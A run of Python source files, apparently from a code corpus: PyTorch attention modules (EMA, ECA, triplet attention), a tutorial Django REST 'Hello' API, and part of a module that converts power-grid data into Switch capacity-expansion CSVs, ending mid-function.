'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, channel, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMAU1, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(1, channel, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=1)
self.register_buffer('mu', mu)
self.momentum = 0.9
# self.file = open('size.txt', 'w')
self.conv1 = nn.Conv2d(channel, channel, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channel, channel, 1, bias=False),
norm_layer(channel))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normalize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the sub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
idn = x
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
n = int(h * w)
x = x.view(b, c, n) # b * c * n
# mu = torch.cat([self.mu], 0)
mu = self.mu.clone()
with torch.no_grad():
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
for i in range(self.stage_num):
# z = torch.bmm(x_t, mu) # b * n * k
# z = torch.matmul(x_t, mu) # b * n * k
z = x_t.matmul(mu) # b * n * k
# z = torch.mm(x_t.squeeze(0), mu.squeeze(0)) # b * n * k
# z = z.unsqueeze(0)
z = F.softmax(z, dim=-1) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0, keepdim=True)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1).contiguous() # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
x = x + idn
x = self.relu(x)
return x
# EMANet for TensorRT
class EMAU(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, channel, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMAU, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(channel, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=0)
self.register_buffer('mu', mu)
self.momentum = 0.9
self.conv1 = nn.Conv2d(channel, channel, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(channel, channel, 1, bias=False),
norm_layer(channel))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normalize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the sub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
idn = x
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
n = int(h * w)
x = x.view(b, c, n) # b * c * n
mu = self.mu
with torch.no_grad():
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
for i in range(self.stage_num):
z = torch.matmul(x_t, mu) # b * n * k
z = F.softmax(z, dim=2) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1).contiguous() # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
x = x + idn
x = self.relu(x)
return x
@ATTENTION.register_module()
class EMA(nn.Module):
'''The Expectation-Maximization Attention Unit (EMAU).
Arguments:
c (int): The input and output channel number.
k (int): The number of the bases.
stage_num (int): The iteration number for EM.
'''
def __init__(self, in_channels, k, stage_num=3, norm_layer=nn.BatchNorm2d):
super(EMA, self).__init__()
self.stage_num = stage_num
mu = torch.Tensor(in_channels, k)
mu.normal_(0, math.sqrt(2. / k)) # Init with Kaiming Norm.
mu = self._l2norm(mu, dim=0)
self.register_buffer('mu', mu)
self.momentum = 0.9
self.conv1 = nn.Conv2d(in_channels, in_channels, 1)
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels, in_channels, 1, bias=False),
norm_layer(in_channels))
self.relu = nn.ReLU(True)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.zero_()
def _l2norm(self, inp, dim):
'''Normalize the inp tensor with l2-norm.
Returns a tensor where each sub-tensor of input along the given dim is
normalized such that the 2-norm of the sub-tensor is equal to 1.
Arguments:
inp (tensor): The input tensor.
dim (int): The dimension to slice over to get the sub-tensors.
Returns:
(tensor) The normalized tensor.
'''
return inp / (1e-6 + inp.norm(dim=dim, keepdim=True))
def forward(self, x):
# The first 1x1 conv
x = self.conv1(x)
# The EM Attention
b, c, h, w = int_size(x)
n = int(h * w)
x = x.view(b, c, n) # b * c * n
mu = self.mu
with torch.no_grad():
x_t = x.permute(0, 2, 1).contiguous() # b * n * c
for i in range(self.stage_num):
z = torch.matmul(x_t, mu) # b * n * k
z = F.softmax(z, dim=2) # b * n * k
z_ = z / (1e-6 + z.sum(dim=1, keepdim=True))
mu = torch.bmm(x, z_) # b * c * k
mu = self._l2norm(mu, dim=1)
# !!! The moving averaging operation
if self.training:
mmu = mu.mean(dim=0)
self.mu *= self.momentum
self.mu += mmu * (1 - self.momentum)
z_t = z.permute(0, 2, 1).contiguous() # b * k * n
x = mu.matmul(z_t) # b * c * n
x = x.view(b, c, h, w) # b * c * h * w
x = self.relu(x)
# The second 1x1 conv
x = self.conv2(x)
return x
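# Added note on the EM iteration above (not in the original file): with the
# flattened features x of shape (b, c, n) and bases mu of shape (c, k),
#   E-step:  z  = softmax(x^T @ mu)                  -> responsibilities (b, n, k)
#   M-step:  mu = l2norm(x @ (z / sum_n z), dim=1)   -> updated bases    (b, c, k)
# and the output x = mu @ z^T is a rank-k re-estimation of the input, which
# is what keeps this attention compact compared with a full non-local block.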
# ---------------------------------------------------------------------------- #
# ECA-Net: Efficient Channel Attention
# ---------------------------------------------------------------------------- #
@ATTENTION.register_module()
class ECA(nn.Module):
"""Constructs a ECA module.
Args:
in_channels: Number of channels of the input feature map
k_size: Adaptive selection of kernel size
"""
def __init__(self, in_channels, k_size=3):
super(ECA, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
# self.conv = nn.Conv1d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
self.conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
# x: input features with shape [b, c, h, w]
b, c, h, w = int_size(x)
# feature descriptor on the global spatial information
y = self.avg_pool(x)
# Two different branches of ECA module, y shape [b, c, 1, 1]
# y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)
# y = self.conv(y.view(b, c, 1).permute(0, 2, 1)).permute(0, 2, 1).view(b, c, 1, 1)
y = self.conv(y.permute(0, 3, 2, 1)).permute(0, 3, 2, 1)
# Multi-scale information fusion
y = self.sigmoid(y)
return x * y
@ATTENTION.register_module()
class AECA(nn.Module):
"""Constructs a Adaptive ECA module.
Args:
in_channels: Number of channels of the input feature map
gamma, b: parameters of the adaptive kernel-size formula (the kernel size itself is currently chosen from in_channels)
"""
def __init__(self, in_channels, gamma=2, b=1):
super(AECA, self).__init__()
# t = int(abs((math.log(channels, 2) + b) / gamma))
# k_size = t if t % 2 else t + 1
if in_channels == 64:
k_size = 3
elif in_channels == 128:
k_size = 5
        elif in_channels in [256, 512]:
            k_size = 7
        else:
            # Guard added for clarity: without it, unsupported channel counts
            # would fail later with an UnboundLocalError on k_size.
            raise ValueError("AECA: unsupported in_channels: %d" % in_channels)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv = nn.Conv1d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
# self.conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
# x: input features with shape [b, c, h, w]
b, c, h, w = int_size(x)
# feature descriptor on the global spatial information
y = self.avg_pool(x)
# Two different branches of ECA module, y shape [b, c, 1, 1]
# y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)
# y = self.conv(y.permute(0, 3, 2, 1)).permute(0, 3, 2, 1)
y = self.conv(y.view(b, c, 1).permute(0, 2, 1)).permute(0, 2, 1).view(b, c, 1, 1)
# Multi-scale information fusion
y = self.sigmoid(y)
return x * y
# ---------------------------------------------------------------------------- #
# Rotate to Attend: Convolutional Triplet Attention Module
# TripletAttention :: https://github.com/LandskapeAI/triplet-attention
# ---------------------------------------------------------------------------- #
class BasicConv(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1,
groups=1, relu=True, bn=True, bias=False):
super(BasicConv, self).__init__()
self.out_channels = out_planes
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=bias)
self.bn = nn.BatchNorm2d(out_planes,eps=1e-5, momentum=0.01, affine=True) if bn else None
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class ChannelPool(nn.Module):
def forward(self, x):
return torch.cat((torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1)), dim=1)
class SpatialGate(nn.Module):
def __init__(self, kernel_size = 3):
super(SpatialGate, self).__init__()
self.compress = ChannelPool()
self.conv = BasicConv(2, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2, relu=False)
def forward(self, x):
x_compress = self.compress(x)
x_out = self.conv(x_compress)
scale = torch.sigmoid_(x_out)
return x * scale
@ATTENTION.register_module()
class TPA(nn.Module):
def __init__(self, in_channels, reduction_ratio=16, kernel_size=3, no_spatial=False):
super(TPA, self).__init__()
self.cw = SpatialGate()
self.hc = SpatialGate()
self.no_spatial=no_spatial
if not no_spatial:
self.hw = SpatialGate()
def forward(self, x):
x_perm1 = x.permute(0,2,1,3).contiguous()
x_out1 = self.cw(x_perm1)
x_out11 = x_out1.permute(0,2,1,3).contiguous()
x_perm2 = x.permute(0,3,2,1).contiguous()
x_out2 = self.hc(x_perm2)
x_out21 = x_out2.permute(0,3,2,1).contiguous()
if not self.no_spatial:
x_out = self.hw(x)
x_out = (1/3)*(x_out + x_out11 + x_out21)
else:
x_out = (1/2)*(x_out11 + x_out21)
return x_out |
py | b415b9eccf2e90437b15283c1a81d47c9ec1c517 | from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets
from profiles_api import serializers
class HelloApiView(APIView):
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Return a list of APIView features"""
an_apiview = [
'Uses HTTP methods as function (get, post, put, delete)',
'Is similar to a traditional Django View',
'Gives you the most control over your application logic',
'Is mapped manually to URLs',
]
return Response({'message': "Hello!", 'an_apiview': an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST,
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""Handle a partial update on an object"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delet an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message"""
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code',
]
return Response({'message': 'Hello API ViewSet', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello massege"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello bello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating a part of an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
|
py | b415babf52936b57bd92968b90621c1c3d9b7fbe | import os
import pandas as pd
from haversine import haversine
from switchwrapper import const
from switchwrapper.helpers import make_branch_indices, make_plant_indices
def grid_to_switch(grid, output_folder, storage_candidate_buses=None):
"""Convert relevant data from a Grid object and command-line-prompted user inputs
to CSVs for use with Switch.
:param powersimdata.input.grid.Grid grid: grid instance.
:param str output_folder: the location to save outputs, created as necessary.
:param set storage_candidate_buses: buses at which to enable storage expansion.
"""
# First, prompt the user for information not contained in const or the passed grid
base_year = get_base_year()
inv_period, period_start, period_end = get_inv_periods()
# Then, calculate information which feeds multiple data frames
cost_at_min_power, single_segment_slope = linearize_gencost(grid)
average_fuel_cost = calculate_average_fuel_cost(grid.plant)
# Finally, generate and save data frames to CSVs
financials_filepath = os.path.join(output_folder, "financials.csv")
build_financials(base_year).to_csv(financials_filepath, index=False)
fuels_filepath = os.path.join(output_folder, "fuels.csv")
build_fuels().to_csv(fuels_filepath, index=False)
fuel_cost_filepath = os.path.join(output_folder, "fuel_cost.csv")
fuel_cost = build_fuel_cost(average_fuel_cost, base_year, inv_period)
fuel_cost.to_csv(fuel_cost_filepath, index=False)
generation_projects_info_filepath = os.path.join(
output_folder, "generation_projects_info.csv"
)
generation_project_info = build_generation_projects_info(
grid.plant, single_segment_slope, average_fuel_cost, storage_candidate_buses
)
generation_project_info.to_csv(generation_projects_info_filepath, index=False)
gen_build_costs_filepath = os.path.join(output_folder, "gen_build_costs.csv")
gen_build_costs = build_gen_build_costs(
grid.plant, cost_at_min_power, inv_period, storage_candidate_buses
)
gen_build_costs.to_csv(gen_build_costs_filepath, index=False)
gen_build_predetermined_filepath = os.path.join(
output_folder, "gen_build_predetermined.csv"
)
build_gen_build_predetermined(grid.plant).to_csv(
gen_build_predetermined_filepath, index=False
)
load_zones_filepath = os.path.join(output_folder, "load_zones.csv")
build_load_zones(grid.bus).to_csv(load_zones_filepath, index=False)
non_fuel_energy_source_filepath = os.path.join(
output_folder, "non_fuel_energy_sources.csv"
)
build_non_fuel_energy_source().to_csv(non_fuel_energy_source_filepath, index=False)
periods_filepath = os.path.join(output_folder, "periods.csv")
build_periods(inv_period, period_start, period_end).to_csv(
periods_filepath, index=False
)
transmission_lines_filepath = os.path.join(output_folder, "transmission_lines.csv")
build_transmission_lines(grid).to_csv(transmission_lines_filepath, index=False)
trans_params_filepath = os.path.join(output_folder, "trans_params.csv")
build_trans_params().to_csv(trans_params_filepath, index=False)
def get_base_year():
"""Prompt the user for a base year.
:return: (*int*) -- base year.
"""
year = input("Please enter base study year (normally PowerSimData scenario year): ")
return int(year)
def get_inv_periods():
"""Prompt the user for investment stage, investment period, start year of each
period, end year of each period.
:return: (*tuple*) -- 3-tuple of lists, investment periods, start years, end years
"""
while True:
num_inv_stages = input("Please enter the number of investment stages: ")
if not num_inv_stages.isdigit():
print("number of investment stages must be an integer, please re-enter.")
else:
num_inv_stages = int(num_inv_stages)
break
if num_inv_stages == 1:
print("Single stage expansion identified.")
else:
print("Multi stage expansion identified.")
while True:
inv_period = input(
"Please enter investment period year, separate by space: "
).split()
if len(inv_period) == num_inv_stages:
try:
inv_period = [int(i) for i in inv_period]
break
except ValueError:
print("All investment period years must be integers, please re-enter.")
continue
print(
"investment period must match the number of investment stages, "
"please re-enter."
)
while True:
period_start = input(
"Please enter start year for each period, separate by space: "
).split()
if len(period_start) == num_inv_stages:
try:
period_start = [int(p) for p in period_start]
break
except ValueError:
print("All start years must be integers, please re-enter.")
continue
print(
"start year for each period must match the number of investment stages, "
"please re-enter."
)
while True:
period_end = input(
"Please enter end year for each period, separate by space: "
).split()
if len(period_end) == num_inv_stages:
try:
period_end = [int(p) for p in period_end]
break
except ValueError:
print("All end years must be integers, please re-enter.")
continue
print(
"end year for each period must match the number of investment stages, "
"please re-enter."
)
return inv_period, period_start, period_end
def calculate_average_fuel_cost(plant):
"""Calculate average fuel cost, by bus_id for buses containing generators.
:param pandas.DataFrame plant: plant data from a Grid object.
:return: (*pandas.DataFrame*) -- data frame of average fuel cost by bus_id.
"""
plant_mod = plant.copy()
# Map our generator types to Switch fuel types
plant_mod["fuel"] = plant_mod["type"].map(const.fuel_mapping)
# Calculate the average fuel cost for each (bus_id, fuel)
relevant_fuel_columns = ["bus_id", "fuel", "GenFuelCost"]
fuel_cost = plant_mod[relevant_fuel_columns].groupby(["bus_id", "fuel"]).mean()
return fuel_cost
def linearize_gencost(grid):
"""Calculate linearized cost parameters, incorporating assumed minimum generation.
:param powersimdata.input.grid.Grid grid: grid instance.
:return: (*tuple*) -- two pandas Series objects, indexed by plant ID within ``grid``:
first is the cost of running each generator at minimum generation.
second is the single-segment linearized slope of each generator's cost curve.
"""
plant_mod = grid.plant.copy()
plant_mod.Pmin = plant_mod.apply(
lambda x: x.Pmax
* const.assumed_pmins.get(x.type, const.assumed_pmins["default"])
if const.assumed_pmins.get(x.type, const.assumed_pmins["default"]) is not None
else x.Pmin,
axis=1,
)
gencost = grid.gencost["before"]
cost_at_min_power = (
gencost.c0 + gencost.c1 * plant_mod.Pmin + gencost.c2 * plant_mod.Pmin**2
)
cost_at_max_power = (
gencost.c0 + gencost.c1 * plant_mod.Pmax + gencost.c2 * plant_mod.Pmax**2
)
single_segment_slope = (cost_at_max_power - cost_at_min_power) / (
plant_mod.Pmax - plant_mod.Pmin
)
single_segment_slope.fillna(0, inplace=True)
return cost_at_min_power, single_segment_slope
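# Worked example (added comment, illustrative numbers only): for a generator
# with gencost c0=100, c1=20, c2=0.05, Pmin=10 MW and Pmax=100 MW:
#   cost_at_min_power    = 100 + 20 * 10  + 0.05 * 10**2  = 305
#   cost_at_max_power    = 100 + 20 * 100 + 0.05 * 100**2 = 2600
#   single_segment_slope = (2600 - 305) / (100 - 10)      = 25.5
# i.e. the quadratic cost curve is replaced by a single linear segment
# between Pmin and Pmax; the fillna(0) guards the Pmax == Pmin case.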
def build_financials(base_year):
"""Parse financial parameters constants and base year input to a data frame.
:param int/str base_year: Information to be added in the 'base_year' column.
:return: (*pandas.DataFrame*) -- single-row data frame with all params.
"""
financials = pd.DataFrame([const.financial_parameters])
financials.insert(0, "base_financial_year", base_year)
return financials
def build_fuels():
"""Parse set of fuels to a data frame.
:return: (*pandas.DataFrame*) -- single-row data frame with all params.
"""
fuels = pd.DataFrame({"fuel": const.fuels})
fuels["co2_intensity"] = "0"
fuels["upstream_co2_intensity"] = "."
return fuels
def build_fuel_cost(average_fuel_cost, base_year, inv_period):
"""Create a data frame of average fuel costs by zone and fuel, and project these
costs to future years.
:param pandas.DataFrame average_fuel_cost: average fuel cost by bus_id.
:param int base_year: base study year used to compute the inflation factors.
:param list inv_period: list of investment period years, as integers.
:return: (*pandas.DataFrame*) -- data frame of fuel costs by period, zone, and fuel.
"""
fuel_cost = average_fuel_cost.copy()
# Retrieve the original `bus_id` and `fuel` columns, rename `bus_id` to `load_zone`
fuel_cost.reset_index(inplace=True)
fuel_cost.rename(columns={"bus_id": "load_zone"}, inplace=True)
# Duplicate each row N times, where N is the number of investment years
original_fuel_cost_length = len(fuel_cost)
fuel_cost = fuel_cost.loc[fuel_cost.index.repeat(len(inv_period))]
# Fill in different years and inflation values for the repeated rows
fuel_cost["period"] = inv_period * original_fuel_cost_length
inflation_factors = [
(1 + const.financial_parameters["interest_rate"]) ** (year - base_year)
for year in inv_period
]
fuel_cost["inflation"] = inflation_factors * original_fuel_cost_length
# Use inflation values to calculate future fuel costs
fuel_cost["fuel_cost"] = fuel_cost["GenFuelCost"] * fuel_cost["inflation"]
fuel_cost["fuel_cost"] = fuel_cost["fuel_cost"].round(2)
# Clean up columns we don't need
fuel_cost.drop(columns=["GenFuelCost", "inflation"], inplace=True)
# Clean up any rows we don't need
fuel_cost = fuel_cost.query("fuel_cost > 0 and fuel in @const.fuels")
return fuel_cost
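# Worked example (added comment, assumed numbers): with base_year=2030,
# inv_period=[2030, 2040] and interest_rate=0.05 in
# const.financial_parameters, the inflation factors are
#   1.05 ** (2030 - 2030) = 1.00 and 1.05 ** (2040 - 2030) ~= 1.63,
# so a 2.00 $/MMBtu fuel is written out as 2.00 and 3.26 for the two periods.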
def build_generation_projects_info(
plant,
single_segment_slope,
average_fuel_cost,
storage_candidate_buses=None,
):
"""Build data frame for generation_projects_info.
:param pandas.DataFrame plant: data frame of current generators.
:param pandas.Series single_segment_slope: single-segment linearized slope of each
generator's cost curve, from :func:`linearize_gencost`.
:param pandas.DataFrame average_fuel_cost: average fuel cost by bus_id, from
:func:`calculate_average_fuel_cost`.
This is single-column ("GenFuelCost") and multi-index ("bus_id", "fuel").
:param set storage_candidate_buses: buses at which to enable storage expansion.
:return: (*pandas.DataFrame*) -- data frame of generation project info.
"""
# Extract information from inputs
indices = make_plant_indices(plant.index, storage_candidate_buses)
all_plant_indices = indices["existing"] + indices["expansion"] + indices["storage"]
num_storage = len(indices["storage"])
# Use inputs for intermediate calculations
fuel_gencost = single_segment_slope * const.assumed_fuel_share_of_gencost
nonfuel_gencost = single_segment_slope * (1 - const.assumed_fuel_share_of_gencost)
fuel_cost_per_generator = plant.apply(
lambda x: average_fuel_cost.loc[
(x.bus_id, const.fuel_mapping[x.type]), "GenFuelCost"
],
axis=1,
)
estimated_heatrate = (fuel_gencost / fuel_cost_per_generator).fillna(0)
# Finally, construct data frame and return
df = pd.DataFrame(index=pd.Index(all_plant_indices, name="GENERATION_PROJECT"))
# Add columns
df["gen_tech"] = (
plant.type.tolist() * 2 + [const.storage_parameters["tech"]] * num_storage
)
gen_load_zone = plant.bus_id.tolist() * 2
if storage_candidate_buses is not None:
gen_load_zone += sorted(storage_candidate_buses)
df["gen_load_zone"] = gen_load_zone
df["gen_connect_cost_per_mw"] = 0
df["gen_capacity_limit_mw"] = "."
df["gen_full_load_heat_rate"] = estimated_heatrate.tolist() * 2 + [0] * num_storage
df["gen_variable_om"] = nonfuel_gencost.tolist() * 2 + [0] * num_storage
df["gen_max_age"] = [
const.assumed_ages_by_type.get(t, const.assumed_ages_by_type["default"])
for t in plant.type.tolist() * 2
] + [const.storage_parameters["max_age"]] * num_storage
df["gen_min_build_capacity"] = 0
df["gen_scheduled_outage_rate"] = 0
df["gen_forced_outage_rate"] = 0
df["gen_is_variable"] = (
list(plant.type.isin(const.variable_types).astype(int)) * 2 + [0] * num_storage
)
df["gen_is_baseload"] = (
list(plant.type.isin(const.baseload_types).astype(int)) * 2 + [0] * num_storage
)
df["gen_is_cogen"] = 0
df["gen_energy_source"] = (
plant.type.map(const.fuel_mapping).tolist() * 2
+ [const.fuel_mapping["storage"]] * num_storage
)
df["gen_unit_size"] = "."
df["gen_ccs_capture_efficiency"] = "."
df["gen_ccs_energy_load"] = "."
df["gen_storage_efficiency"] = "."
df["gen_store_to_release_ratio"] = "."
if num_storage > 0:
num_gens = len(indices["existing"]) + len(indices["expansion"])
df["gen_storage_efficiency"] = ["."] * num_gens + [
const.storage_parameters["efficiency"]
] * num_storage
df["gen_storage_max_cycles_per_year"] = ["."] * num_gens + [
const.storage_parameters["max_cycles"]
] * num_storage
# Refine data
# Add generation expansion limits
df.loc[indices["expansion"], "gen_capacity_limit_mw"] = [
const.assumed_capacity_limits.get(t, const.assumed_capacity_limits["default"])
for t in plant.type.tolist()
]
# Ensure that no fueled generators with zero heat-rate can be built
df.loc[
(
df.index.isin(indices["expansion"])
& (df.gen_full_load_heat_rate == 0)
& df.gen_energy_source.isin(const.fuels)
),
"gen_capacity_limit_mw",
] = 0
# Ensure that heat rates are not written for non-fueled generators
df.loc[df.gen_energy_source.isin(const.non_fuels), "gen_full_load_heat_rate"] = "."
df.reset_index(inplace=True)
return df
def build_gen_build_costs(
plant,
cost_at_min_power,
inv_period,
storage_candidate_buses=None,
):
"""Build a data frame of generation projects, both existing and hypothetical.
:param pandas.DataFrame plant: data frame of current generators.
:param pandas.Series cost_at_min_power: cost of running generator at minimum power.
:param list inv_period: list of investment period years.
:param set storage_candidate_buses: buses at which to enable storage expansion.
:return: (*pandas.DataFrame*) -- data frame of existing and hypothetical generators.
"""
# Build indices, extract constants used to populate build costs
indices = make_plant_indices(plant.index, storage_candidate_buses)
num_existing = len(indices["existing"])
num_expansion = len(indices["expansion"])
num_storage = len(indices["storage"])
# Build additional lists for each column
existing_overnight = plant["type"].map(const.investment_costs_by_type).tolist()
expansion_overnight = (
existing_overnight
+ [const.storage_parameters["overnight_power_cost"]] * num_storage
)
existing_om = (cost_at_min_power / plant.Pmax).fillna(0.0).tolist()
expansion_om = existing_om + [0] * num_storage
# Extend these lists to multiple investment years
all_indices = indices["existing"] + (
indices["expansion"] + indices["storage"]
) * len(inv_period)
all_build_years = [const.base_year] * num_existing + sum(
[[i] * (num_expansion + num_storage) for i in inv_period], []
)
all_overnight_costs = [0] * num_existing + expansion_overnight * len(inv_period)
all_gen_fixed_om = existing_om + expansion_om * len(inv_period)
# Create a dataframe from the collected lists
gen_build_costs = pd.DataFrame(
{
"GENERATION_PROJECT": all_indices,
"build_year": all_build_years,
"gen_overnight_cost": all_overnight_costs,
"gen_fixed_om": all_gen_fixed_om,
}
)
# Add a relevant storage column, as necessary
if num_storage > 0:
expansion_energy_cost = ["."] * num_expansion + [
const.storage_parameters["overnight_energy_cost"]
] * num_storage
gen_build_costs["gen_storage_energy_overnight_cost"] = [
"."
] * num_existing + expansion_energy_cost * len(inv_period)
return gen_build_costs
def build_gen_build_predetermined(plant):
"""Build a data frame of generator capacity and build year
:param pandas.DataFrame plant: data frame of generators in a grid instance.
:return: (*pandas.DataFrame*) -- data frame of existing generators.
"""
gen_build_predetermined = plant["Pmax"].reset_index()
gen_build_predetermined["build_year"] = 2019
gen_build_predetermined.rename(
columns={
"plant_id": "GENERATION_PROJECT",
"Pmax": "gen_predetermined_cap",
},
inplace=True,
)
indices = make_plant_indices(plant.index)
gen_build_predetermined["GENERATION_PROJECT"] = indices["existing"]
gen_build_predetermined = gen_build_predetermined[
["GENERATION_PROJECT", "build_year", "gen_predetermined_cap"]
]
return gen_build_predetermined
def build_load_zones(bus):
"""Parse bus data frame and load zone constants to a data frame.
:param pandas.DataFrame bus: bus data from a Grid object.
:return: (*pandas.DataFrame*) -- data frame with constants added to bus indices.
"""
load_zones = bus.index.to_frame()
load_zones["dbid"] = range(1, len(load_zones) + 1)
for k, v in const.load_parameters.items():
load_zones[k] = v
load_zones.rename(columns={"bus_id": "LOAD_ZONE"}, inplace=True)
return load_zones
def build_non_fuel_energy_source():
"""Parse list of non fuel energy sources to a data frame
:return: (*pandas.DataFrame*) -- single column data frame with non-fuel energy
sources
"""
non_fuel_energy_source = pd.DataFrame({"energy_source": const.non_fuels})
return non_fuel_energy_source
def build_periods(inv_period, period_start, period_end):
"""Parse user input investment period information into a data frame.
:param list inv_period: list of strings for each investment period year
:param list period_start: list of strings for start year of each period
:param list period_end: list of strings for end year of each period
:return: (*pandas.DataFrame*) -- periods data frame with investment period
information.
"""
periods = pd.DataFrame(columns=["INVESTMENT_PERIOD", "period_start", "period_end"])
periods["INVESTMENT_PERIOD"] = inv_period
periods["period_start"] = period_start
periods["period_end"] = period_end
return periods
def branch_efficiency(from_bus_voltage, to_bus_voltage):
"""Calculate branch efficiency based on start and end bus baseKV.
:param int/float from_bus_voltage: start bus baseKV
:param int/float to_bus_voltage: end bus baseKV
:return: (*float*) -- efficiency rate of a branch
"""
if from_bus_voltage == to_bus_voltage:
return const.assumed_branch_efficiencies.get(
from_bus_voltage, const.assumed_branch_efficiencies["default"]
)
else:
return const.assumed_branch_efficiencies["default"]
def build_aclines(grid):
"""Create a data frame for ac transmission lines with required columns for
:func:`build_transmission_lines`.
:param powersimdata.input.grid.Grid grid: grid instance
